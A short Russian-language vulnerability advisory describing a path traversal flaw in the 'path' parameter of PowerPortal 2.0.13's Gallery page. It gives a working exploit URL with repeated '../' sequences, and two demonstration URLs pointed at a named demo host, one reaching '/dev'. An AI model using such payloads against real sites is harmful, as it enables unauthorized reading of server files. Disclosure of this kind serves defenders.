Программа: PowerPortal 2.0.13

Уязвимость позволяет удаленному злоумышленнику получить несанкционированный
доступ к конфиденциальной информации на целевой системе. Уязвимость существует
из-за ошибки в проверке входных данных в параметре «path». Атакующий может
получить несанкционированный доступ к конфиденциальной информации на целевой
системе.

Эксплоит:

http://site.com/index/Gallery/?path=../../../../../../../

Демонстрация:

http://demo.powerportal2.com/index/Gallery/?path=../../../../../../../

http://demo.powerportal2.com/index/Gallery/?path=../../../../../../../dev



Оставить мнение